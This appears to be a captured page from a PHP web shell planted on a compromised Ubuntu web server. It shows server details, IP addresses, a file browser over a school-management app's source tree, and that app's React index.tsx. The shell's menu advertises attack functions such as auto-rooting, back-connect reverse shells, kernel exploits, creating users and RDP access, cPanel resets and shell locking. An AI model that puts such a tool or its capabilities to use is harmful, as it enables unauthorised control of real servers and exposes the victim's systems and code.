Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core-ui-code /
app /
containers /
[ HOME SHELL ]
Name
Size
Permission
Action
academic
[ DIR ]
drwxrwxr-x
admission
[ DIR ]
drwxrwxr-x
auth
[ DIR ]
drwxrwxr-x
dashboard
[ DIR ]
drwxrwxr-x
default
[ DIR ]
drwxrwxr-x
invoice
[ DIR ]
drwxrwxr-x
registration
[ DIR ]
drwxrwxr-x
superadmin
[ DIR ]
drwxrwxr-x
system
[ DIR ]
drwxrwxr-x
index.tsx
1.29
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.tsx
import * as React from 'react'; import { useSelector, shallowEqual, useDispatch } from 'react-redux'; import { Footer, Header } from './dashboard/layout'; import { renderRoutes } from 'react-router-config'; import { authorizedRoutes } from 'config'; interface IndexComponentProps {} const Index: React.FunctionComponent<IndexComponentProps> = ( props, ): JSX.Element => { const dispatch = useDispatch(); const { loggedUserInfo } = useSelector( (state: any) => ({ loggedUserInfo: state.auth?.userInfo, }), shallowEqual, ); // const renderContent = () => { // if (loggedUserInfo.role?.includes('superadmin')) // return renderRoutes(superadminRoutes); // else if (loggedUserInfo.role?.includes('admin')) // return renderRoutes(authorizedRoutes); // else null; // }; return ( <React.Fragment> <Header /> <main className="main-content"> <section className="content-block"> <div className="container-fluid"> {renderRoutes(authorizedRoutes)} {/* {renderContent} */} </div> </section> </main> <Footer /> {/* replace d-block inplace of d-none for activation of overlay */} <div className="rightbar-overlay d-none"></div> </React.Fragment> ); }; export default Index;
Close